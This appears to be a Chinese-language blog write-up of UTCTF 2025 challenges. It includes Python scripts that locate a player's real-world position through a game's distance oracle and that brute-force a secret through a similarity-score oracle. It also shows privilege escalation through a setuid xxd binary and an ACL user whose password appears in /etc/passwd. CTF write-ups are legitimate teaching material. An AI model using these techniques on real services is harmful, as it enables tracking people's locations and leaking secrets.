utctf 2025 Web Writeup

Web

Number Champion

1
The number 1 player in this game, geopy hit 3000 elo last week. I want to figure out where they train to be the best.
2

3
Flag is the address of this player (according to google maps), in the following format all lowercase:
4

5
utflag{<street-address>-<city>-<zip-code>}
6

7
For example, if the address is 110 Inner Campus Drive, Austin, TX 78705, the flag would be utflag{110-inner-campus-drive-austin-78705}
8

9
By Samintell (@Samintell on discord)

感覺有點抽象，來看看題目吧。

首先進來之後，可以看到題目會嘗試取得我們地理位置。

同意之後你可以配對對手然後跟他們 battle 數字大小。

但玩過幾輪過後會發現，你今天不管輸入多大，多奇怪的數字你都是必輸的。

感覺看不出甚麼東西，我們嘗試用 burp suite 看看有沒有特別的。

總共有這三個 route

1
POST /register?lat=25.0353635&lon=121.5712388 HTTP/1.1
2
Host: numberchamp-challenge.utctf.live
3
Accept: */*
4
Accept-Language: en-US,en;q=0.9,zh-TW;q=0.8,zh;q=0.7
5
Content-Length: 0
6
Origin: https://numberchamp-challenge.utctf.live
7
Priority: u=1, i
8
Referer: https://numberchamp-challenge.utctf.live/
9
Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
10
Sec-Ch-Ua-Mobile: ?0
11
Sec-Ch-Ua-Platform: "Windows"
12
Sec-Fetch-Dest: empty
13
Sec-Fetch-Mode: cors
14
Sec-Fetch-Site: same-origin
15
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
16
Connection: close

測試一下，不管經緯度如何，給出來的都是不同的 uuid，然後初始分數都是 1000 分

1
{"elo":1000,"user":"Diorite Hummingbird 919","uuid":"5b0b00f0-6ed6-46c7-878d-343263dbcb75"}

match

這個了話會給你跟對手的 distance (實際距離)

1
POST /match?uuid=c5abc7ad-c2b4-43bd-bdb7-8f5dc0e465fa&lat=25.0353635&lon=121.5712388 HTTP/2
2
Host: numberchamp-challenge.utctf.live
3
Accept: */*
4
Accept-Language: en-US,en;q=0.9,zh-TW;q=0.8,zh;q=0.7
5
Content-Length: 0
6
Origin: https://numberchamp-challenge.utctf.live
7
Priority: u=1, i
8
Referer: https://numberchamp-challenge.utctf.live/
9
Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
10
Sec-Ch-Ua-Mobile: ?0
11
Sec-Ch-Ua-Platform: "Windows"
12
Sec-Fetch-Dest: empty
13
Sec-Fetch-Mode: cors
14
Sec-Fetch-Site: same-origin
15
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36

1
{"distance":7825.89656037577,"elo":971,"user":"Schist Darter 701","uuid":"5dead638-9271-4c61-8b20-d4a2381f6483"}

battle

最後的話是指定兩個 uuid 互相對戰，但你必輸

1
POST /battle?uuid=c5abc7ad-c2b4-43bd-bdb7-8f5dc0e465fa&opponent=6663a74f-d6d3-465f-9b8b-e819cdad5a16&number=123 HTTP/2
2
Host: numberchamp-challenge.utctf.live
3
Accept: */*
4
Accept-Language: en-US,en;q=0.9,zh-TW;q=0.8,zh;q=0.7
5
Content-Length: 0
6
Origin: https://numberchamp-challenge.utctf.live
7
Priority: u=1, i
8
Referer: https://numberchamp-challenge.utctf.live/
9
Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
10
Sec-Ch-Ua-Mobile: ?0
11
Sec-Ch-Ua-Platform: "Windows"
12
Sec-Fetch-Dest: empty
13
Sec-Fetch-Mode: cors
14
Sec-Fetch-Site: same-origin
15
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36

1
{"elo":960,"opponent_number":6028,"result":"loss"}

看到這邊後，會去看看題述，可以知道我們要想辦法超過三千分。但你有發現嗎，今天我們可以任意註冊帳號，又可以指定兩個人對戰。我們是不是可以先指定一個帳號，然後開很多帳號輸給他，就可以拿到 3000 分了。

~~( 但我後來發現一件事就是我指定兩個相同的帳號刷更快 )~~

好，刷到 3000 分後我們回到 match 那邊看看

1
POST /match?uuid=5b0b00f0-6ed6-46c7-878d-343263dbcb75&lat=25.0353635&lon=121.5712388
2

3
{"distance":7689.855053589143,"elo":3000,"user":"geopy","uuid":"d0f627bc-ac15-4d45-8e08-73ee3b5fd06c"}

給出目標的 distance 了! 這時候只要修改經緯度，找到 geopy 這個人在那裡就好了!

我們先手動測試一個範圍，最後寫個二分搜就可以了!

1
import requests
2

3
def get_distance(lat, lon, uuid):
4
    url = f"https://numberchamp-challenge.utctf.live/match?uuid={uuid}&lat={lat}&lon={lon}"
5
    headers = {
6
        "Accept": "*/*",
7
        "Referer": "https://numberchamp-challenge.utctf.live/",
8
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
9
    }
10
    response = requests.post(url, headers=headers)
11
    if response.status_code == 200:
12
        return response.json().get("distance", float("inf"))
13
    return float("inf")
14

15
def find_best_coordinates(uuid, lat=40, lon=-83.5, step=0.1, max_iterations=100):
16
    best_lat, best_lon = lat, lon
17
    min_distance = get_distance(lat, lon, uuid)
18

19
    for _ in range(max_iterations):
20
        for dlat in [-step, 0, step]:
21
            for dlon in [-step, 0, step]:
22
                new_lat, new_lon = best_lat + dlat, best_lon + dlon
23
                distance = get_distance(new_lat, new_lon, uuid)
24
                print(f"Trying lat: {new_lat}, lon: {new_lon} -> distance: {distance}")
25

26
                if distance < min_distance:
27
                    min_distance = distance
28
                    best_lat, best_lon = new_lat, new_lon
29

30
        if min_distance == 0:
31
            break
32

33
        step /= 2
34

35
    return best_lat, best_lon, min_distance
36

37
uuid = "bbea5a2e-2537-4c0f-a49d-33ccd046c038"
38
lat, lon, distance = find_best_coordinates(uuid)
39
print(f"Best coordinates: lat={lat}, lon={lon}, distance={distance}")

~~腳本 AI 力量~~

最後把找到的經緯度拿去搜尋

1
Best coordinates: lat=39.940418395028665, lon=-82.99669527523196, distance=0.0

就是這間了!

utflag{1059-s-high-st-columbus-43206}

OTP

1
Find your One True Pairing on this new site I made! Whoever has the closest OTP to the "flag" will get their very own date!
2

3
This problem resets every 30 minutes.
4

5
By Sasha (@kyrili on discord)

一樣是黑箱，我們先來看看功能。

1
POST /index.php
2

3
username=123&password=123

指定兩人配對分數

1
POST /index.php
2

3
username1=123&username2=321
4

5

6
---output---
7

8
The pairing for 123 and 321 is: 6

搜尋全部人配對分數

1
POST /index.php
2

3
usernamesearch=flag
4

5
---output---
6
flag x flag: 0
7
az6_18539 x flag: 207
8
az6_18529 x flag: 207
9
az6_18530 x flag: 207
10
az6_18531 x flag: 207
11
az6_18532 x flag: 207
12
az6_18518 x flag: 207
13
az6_18519 x flag: 207
14
az6_18520 x flag: 207
15
az6_18521 x flag: 207
16
az6_18522 x flag: 207
17
az6_18523 x flag: 207
18
az6_18524 x flag: 207
19
az6_18551 x flag: 207
20
123 x flag: 2274
21
321 x flag: 2274

然後真正的 flag 是 flag，在這邊都還看不出 flag 在哪。

一開始我以為要 sqli，但怎麼注入都不行，註冊那邊他甚至會跟你說：

1
Invalid user/secret combo. Usernames and secrets can only contain alphanumeric characters, underscore, and curly braces. Usernames must be 1-16 characters long and secrets must be 1-32 characters long.

…等等，特殊字元，又有比對分數系統，我通靈出分數的計算條件可能是判斷兩個人的密碼夠不夠接近，若越接近分數則越小。(因為剛剛可以看出 flag x flag = 0)

~~這邊我通靈超久~~

馬上來實驗看看

1
username=soaruser1&password=utf // reg
2

3
soaruser1 x flag : 2051
4

5
username=soaruser2&password=utfl //reg
6

7
soaruser2 x flag : 1943
8

9
username=soarbutchardif&password=utfk //reg for ascii different
10

11
soarbutchardif x flag : 1950

賓果，密碼越相近，分數越低。

繼續寫 python 來爆破。

1
import requests
2
import random
3
import string
4
from pwn import info
5

6
def generate_random_username():
7
    try:
8
        username_length = random.randint(8, 16)
9
        valid_chars = string.ascii_letters + string.digits + "_{}"
10
        return ''.join(random.choices(valid_chars, k=username_length))
11
    except Exception as e:
12
        print(f"Error in generate_random_username: {e}")
13
        return None
14

15
def register(username, password):
16
    url = 'http://challenge.utctf.live:3725/index.php'
17
    data = {'username': username, 'password': password}
18

19
    try:
20
        response = requests.post(url, data=data, timeout=3)
21
        if f"Successfully registered {username}" in response.text:
22
            print(f"Successfully registered {username}")
23
        else:
24
            print(f"Registration failed for {username}")
25
    except requests.exceptions.Timeout:
26
        print(f"Timeout occurred during registration for {username}. Retrying...")
27
        return False
28
    except Exception as e:
29
        print(f"Error during registration for {username}: {e}")
30
        return False
31

32
    return True
33

34
def compare_score(username1, username2):
35
    url = 'http://challenge.utctf.live:3725/index.php'
36
    data = {'username1': username1, 'username2': username2}
37

38
    try:
39
        response = requests.post(url, data=data, timeout=2)
40
        if 'The pairing for' in response.text:
41
            score = int(response.text.split('The pairing for')[1].split('is:')[1].split('</p>')[0].strip())
42
            return score
43
    except requests.exceptions.Timeout:
44
        print("Timeout occurred during score comparison. Retrying...")
45
        return None
46
    except Exception as e:
47
        print(f"Error during score comparison: {e}")
48
        return None
49

50
    return None
51

52
def search(now_flag_state):
53
    valid_chars = string.ascii_letters + string.digits + "_{}"
54
    less_score = 100000
55
    ans_char = ''
56

57
    for i in valid_chars:
58
        try:
59
            print(f"Trying character: {i}")
60
            random_username = generate_random_username()
61
            if random_username is None:
62
                print("Error generating random username. Skipping iteration.")
63
                continue
64

65
            register(random_username, now_flag_state + i)
66
            score = compare_score(random_username, 'flag')
67
            if score is None:
68
                print(f"Error comparing score for {random_username}. Skipping.")
69
                continue
70

71
            print("[+]" + str(score))
72
            if score < less_score:
73
                print(f"Found character: {i}, with score: {score}")
74
                less_score = score
75
                ans_char = i
76
        except Exception as e:
77
            print(f"Error in search iteration for character '{i}': {e}")
78

79
    print(f"Ans: {ans_char}, with score: {less_score}")
80

81
search('utflag{On3_sT3P_4t_4_t1m3}')

我這樣寫是因為他很長送到一半就 timeout，所以我一個一個送多跑幾次。

賽後解

Misc - Trapped in Plain Sight 1

一個 ssh 機器，讓你連上去

1
trapped@47ca6c33ca55:~$ ls -al
2
total 32
3
dr-xr-xr-x 1 trapped  trapped  4096 Mar 14 19:23 .
4
dr-xr-xr-x 1 root     root     4096 Mar 14 19:23 ..
5
-r--r--r-- 1 trapped  trapped   220 Feb 25  2020 .bash_logout
6
-r--r--r-- 1 trapped  trapped  3771 Feb 25  2020 .bashrc
7
-r--r--r-- 1 trapped  trapped   807 Feb 25  2020 .profile
8
-r-x------ 1 noaccess noaccess   28 Mar 14 19:23 flag.txt

恩沒權限? 那來看看有啥特別的 UID 我們可以用

1
trapped@47ca6c33ca55:~$ find / -perm -4000 -type f 2>/dev/null
2
/usr/bin/passwd
3
/usr/bin/chsh
4
/usr/bin/su
5
/usr/bin/chfn
6
/usr/bin/mount
7
/usr/bin/umount
8
/usr/bin/newgrp
9
/usr/bin/gpasswd
10
/usr/bin/xxd
11
/usr/lib/openssh/ssh-keysign
12
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

好耶 xxd 直接讀檔

1
trapped@47ca6c33ca55:~$ xxd flag.txt
2
00000000: 7574 666c 6167 7b53 7065 6369 614c 5f50  utflag{SpeciaL_P
3
00000010: 6572 6d69 7373 696f 6e7a 7d0a            ermissionz}.

Misc - Trapped in Plain Sight 2

上一題的 revenge，進去後一樣先 ls -al 看看

1
trapped@30ea1b120183:~$ ls -al
2
total 36
3
dr-xr-xr-x  1 trapped trapped 4096 Mar 14 19:23 .
4
dr-xr-xr-x  1 root    root    4096 Mar 14 19:23 ..
5
-r--r--r--  1 trapped trapped  220 Feb 25  2020 .bash_logout
6
-r--r--r--  1 trapped trapped 3771 Feb 25  2020 .bashrc
7
-r--r--r--  1 trapped trapped  807 Feb 25  2020 .profile
8
----r-----+ 1 root    root      28 Mar 14 19:23 flag.txt

沒看過的 + 號，上網查一下，發現那是 ACL

ACL (Access Control List, 存取控制清單)，這表示除了 rwx 權限之外，還有額外的權限設定。

那我們用 getfacl

1
trapped@30ea1b120183:~$ getfacl flag.txt
2
# file: flag.txt
3
# owner: root
4
# group: root
5
user::---
6
user:secretuser:r--
7
group::---
8
mask::r--
9
other::---

可以看到有個 secretuser，來看看他的 /etc/passwd

1
trapped@30ea1b120183:~$ cat /etc/passwd | grep secretuser
2
secretuser:x:1001:1001:hunter2:/home/secretuser:/bin/sh

hunter2 ? 那是啥? 通靈感覺是密碼…

1
trapped@30ea1b120183:~$ su secretuser
2
Password:
3
$ ls
4
flag.txt
5
$ cat flag.txt
6
utflag{4ccess_unc0ntroll3d}

Thanks for reading!

utctf 2025 Web Writeup

周六 5月 17 2025

1688 字 · 13 分鐘

ctfs utctf ctf web